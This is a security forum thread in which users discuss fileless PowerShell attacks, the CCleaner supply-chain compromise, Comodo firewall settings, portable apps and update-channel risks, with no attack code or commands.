- Jul 5, 2016
- 416
What is the e-mail setup like or are they not allowed to use e-mail?
What is the e-mail setup like or are they not allowed to use e-mail?
OnPrem exchange w/HES filtration, attachment restrictions. (Size, Type, etc) Sandboxing of attachments with delayed release. Link stripping in emails.
- Oct 1, 2017
- 24
Fileless attacks doesn't mean IOCless attacks 
A clear example is PowerShell-based attacks where the victim only needs to execute a given line of code, no files needed. It's fileless, but it's not IOCless, as we will have logs for network connections back to the C2, logs for PS execution (if properly configured via GPO) and so on.
A clear example is PowerShell-based attacks where the victim only needs to execute a given line of code, no files needed. It's fileless, but it's not IOCless, as we will have logs for network connections back to the C2, logs for PS execution (if properly configured via GPO) and so on.
Recently someone walked onto this forum to promote their anti-ransomware product which was suspicious in the sense that it was deceptive in the detection's (fake detection's). Simply because it was being promoted on this forum and because it was allegedly entirely free, not many people at all raised suspicion it appeared... Until I took a lot out of suspicion and posted an analysis on the very thread everyone was reading. Few days later I got a response from Avast notifying me they found it to be deceptor-like and have added a detection for it being malicious, and the thread was removed after I reported it.
That speaks for itself... People seem to trust what they read on forums like this more than other sources, and the right approach from an attacker will be capable of socially engineering anyone. Even corporate companies who work in the security industry have been fooled, I mean the CCleaner thing was very interesting because the breach wasn't recognised for at-least a few weeks (of course this was not Avast's fault like some think though, they did everything they could after it was reported to them about suspicious activity).
File-less attacks are real, the threat is real... And social engineering is a huge threat to all of us because people who are good at it will design their approaches in a way to meddle with our brain mechanics, attempt top grab information from us without raising noticeable alarm/fool us into doing something which we wouldn't have normally done maybe. Especially for a business, an attacker may social engineer multiple employees for information which can be used to help them successfully deploy a sophisticated attack.
- Dec 29, 2014
- 1,716
Well, there is the option to straight firewall block connections for an application(s). Also, there are some good updater programs that can help make it more plausible to shut down these connections. Found this list:
12 Free Programs That Help Keep Your Software Updated
Ive been using PortableApps which updates the programs on a regular basis. I just have the program's connection requests blocked (Comodo) which surprisingly does block a good bit of traffic and bring some peace of mind about internet connections. I also make use of the "Ask" option in CFW for a good many programs that I want to see an alert for because the program might be little known or whatever. Just one way to keep an eye on an app without having to survey the logs constantly...
Last edited:
You're 100% right about that, but CCleaner is (*was*) reputable and is generally (*was*) trusted software. Therefore most people would have probably had it white-listed, preventing a firewall from intervening with the connections. Maybe someone paranoid would have put a restriction up or blocked the automatic updates entirely, but I doubt many would have done this at all in comparison to the millions that had it installed and were actively using it.
This sort of attack can happen to many other companies as well, any software that queries to a network/has auto-update functionality can be hijacked with a similar/same technique.
Manually updating is a step in the right direction say on case but I doubt a majority would do this, only people who are focused on security at lot (e.g. maybe a few here like yourself). General Home users with inexperience or probably businesses as well would have left it to auto-update because of the reputation it had, especially after it was acquired by Avast!
- May 13, 2017
- 2,685
I was considering this method. Unfortunately those apps are being updated by volunteers and as the result some are weeks, even months behind the actual version.
- Dec 29, 2014
- 1,716
You are 100% right. Every reason here to go with the trimmed Trusted Vendors List in Comodo. I recommend doing this even though it's a hassle, and o/c most wouldn't even realize where the TVL is to change it. BTW, trimming the TVL is pointless without turning off Cloud Lookup. Comodo will just add the vendor for programs like CCleaner, once the program is detected on the system. That means the program is 100% free to roam and do as it pleases. However, seems that Comodo Firewall (Firewall element in Custom mode) does give the user at least one initial alert automatically. Then it will continue to alert new connection attempts until the user chooses "Remember". I think this is correct. In that case, the rule can be in place for the main application before Cloud Lookup adds the vendor (Avast). The user can choose to block and remember at that point and the installer won't even make it to the drive.
Wow, one weird thing I just realized. If the new CCleaner sig is from Avast, I have that in my trimmed list on another PC because it's running Avast. A security company owning an app adds a little bit of a strange dynamic there. For sure, there should be a special signature designation for a non-security app I guess...
I would like to know if the rogue CCleaner installer connection with the trusted vendor there or not there would have been contained by CFW or maybe blocked by Heuristic Command-line. That would be an interesting thing to see but I fear that might be the one that gets by Comodo even with the trimmed TVL and no Cloud Lookup. Maybe the HC-L would kick in but I don't think so. HIPS might go off in safe mode. Actually I think it would, but the only chance to block the CCleaner installer episode (installer already on the PC) using Comodo would have been the net connection of the main app I think...
@AtlBo Now I think about it, thanks to your points, I thought of an idea I think is actually quite good - problem is maintenance and I doubt it'll ever be done anytime soon at-least. Companies who provide software should opt-in with security vendors (including Microsoft) to automatically block connections to hosts within their software which have not been verified by the company prior to the update.
For ex... I'll use CCleaner for the ex.
1. CCleaner new version will connect to a new host for an update after a server migration. The update is ready to roll out.
2. Avast/Piriform (now owned by Avast) submit the host to multiple vendors with a click. Because Avast are a security vendor.
3. Now if CCleaner attempts to make a connection anywhere else other than it is supposed to, hand-submitted by the vendor to the server of multiple security vendors automatically, the connection is automatically blocked.
It can be flawed due to zero-day exploitation of a firewall product / techniques like code injection to use another trusted process to do the dirty work, but it would make things a lot harder. This would have mitigated this specific attack we recently spectated with CCleaner, making it a lot harder (e.g. either find a way to submit on their behalf, or use a technique to prevent detection like code injection into a trusted process -> which may be picked up by dynamic protection components anyway).
They could at-least have a public list for people to add to allow, block all other connections from the software's processes automatically. Like an adblocker but auto-block by default for a program -> DB automatically retrieved at run-time so the latest used domains can be used for connections in the software, everything else auto-blocked as it wouldn't be necessary unless specified on the public list owned by the vendor for that software.
For ex... I'll use CCleaner for the ex.
1. CCleaner new version will connect to a new host for an update after a server migration. The update is ready to roll out.
2. Avast/Piriform (now owned by Avast) submit the host to multiple vendors with a click. Because Avast are a security vendor.
3. Now if CCleaner attempts to make a connection anywhere else other than it is supposed to, hand-submitted by the vendor to the server of multiple security vendors automatically, the connection is automatically blocked.
It can be flawed due to zero-day exploitation of a firewall product / techniques like code injection to use another trusted process to do the dirty work, but it would make things a lot harder. This would have mitigated this specific attack we recently spectated with CCleaner, making it a lot harder (e.g. either find a way to submit on their behalf, or use a technique to prevent detection like code injection into a trusted process -> which may be picked up by dynamic protection components anyway).
They could at-least have a public list for people to add to allow, block all other connections from the software's processes automatically. Like an adblocker but auto-block by default for a program -> DB automatically retrieved at run-time so the latest used domains can be used for connections in the software, everything else auto-blocked as it wouldn't be necessary unless specified on the public list owned by the vendor for that software.
- Dec 29, 2014
- 1,716
Like a list of clean IPs maybe that could be used by a-v/security similar to signatures? Good idea. Lots of the app devs use like Cloud Front or some other server host for their updates, so I guess they might not completely control the IP range of their updates. Not sure how that might work. Even security vendors do this like Qihoo who uses Amazon...or last time I checked do.
You are correct, does seem like alot can be done in this area. I have actually been wondering if a site like IP Void might become the next Virus Total but for internet connections. A little bit different topic but would we end up seeing a Voodoo Shield firewall of the internet? Kind of a cool thought but maybe IPs would be tougher to police and keep up with than file sigs. Who knows, I guess someone could become interested and invest in such a way of doing things...
Yeah, this was my thinking too. I came to the conclusion it wasn't worth the risk leaving the program open that way. For me, the side benefit has been the decreased traffic which seems much more manageable to me now. I feel like I can even police local and outbound IPv6 with the decrease in outbound/inbound from apps...
- Dec 29, 2014
- 1,716
A good idea is to set MS apps set to "Ask" in the firewall element in Comodo FW. Good way to keep up with what's happening. Setting cmd.exe to ask means getting a chance to block rogue attempts to use that interface for running script/code for malicious downloads, etc. Also, have it set for taskeng.exe, taskhost.exe, WinSat.exe, explorer.exe, runonce.exe, cscript.exe (if wscript ever alerts I will set the rule to ask)...
I doubt it because it would be too difficult for a normal person to use properly. Alerts coming left right and centre. Auto-block = now problems with programs functioning. Anti-executable is good but only experienced people use it if they can be bothered to keep up with alerts or don't install much, normal home users won't use something like that, they want auto-resolve. But anti-exe works well still because it is before execution. After execution happens, anything can happen.
But I like the idea if it could be pulled off in an elegant way
same for my other idea, but I doubt it could be pulled off elegantly anytime soon at leastPortable Apps are crucial. No external connectivity required or even on in most cases. Let's face it, do you really need to update Bleachbit all of the time? You don't, it works perfectly fine for years without updates. Unzip a hash verified version, toss it into a folder, pin a shortcut to it and leave it alone - for a year or two and close off that vector of compromise permanently. So simple, so powerful.
As for the Ccleaner thing. I used a combination of Ccleaner and Agomo(CC Cloud) until around May of this year. Then at the end of May (possibly early June) my APT Appliance (FortiSandbox) flagged it as a new, high risk threat after it bounced it around in the sandbox. At that point I immediately cancelled CC-Cloud subscription, and removed Ccleaner from all machines. It turns out, I dodged the bullet on that by paying close attention to a very powerful APT appliance. Recently, I discovered Private Internet Access (PIA) was serving an EXE Injector on their custom installer. FortiSandbox (APT) flagged it for the first time. Crazy right? It happens and I believe these update channel compromises are going to become more common.
Having an APT appliance in the home is powerful. Someday I will post one of the 50 page analysis outputs it generates. Currently every file/program/script/webpage coming into my network is APT scanned. I'm taking NO chances.
- May 13, 2017
- 2,685
That's assuming Bleachbit has a patch for any and every reported vulnerability. Most vulnerabilities go undiscovered.
- Jul 5, 2016
- 416
I remember that thread. When I told him MS didn't like it all he said was the detections were FP's I installed in it Shadow Defender because I thought it looked suspicious.
Will I ever update bleachbit? Sure.. Eventually. But why worry about it when it's portable on an isolated stick and only executed every few weeks for a few seconds on each machine? None of these vulns would even be applicable in that situation.
I'm wondering how long it'll take until someone breaks into the Windows update servers, laces an update with malicious code and Microsoft doesn't notice and pushes the update to everyone. Hundreds of millions - if not billions by that time - of systems crippled. Scary prospect.
Also curious how the planet would react to such a scenario.
Last edited:
I'm rolling with the assumption Windows Update Channel may already be compromised and there is nothing we can do about it. My migrations to secured linux or alternative OS's is going very slowly, painstaking in some cases so until that is complete that fear will still be there.
With all the crapware Microsoft's shovelled down its users throats over the years using Windows Update I guess you could say it's always been compromised somewhat.
I generally leave it a good couple of weeks before I install Windows updates just in case there's any news about said updates turning systems into paperweights, so hopefully if there is a malicious update pushed I'll get wind before I install it.
Last edited:
Similar threads
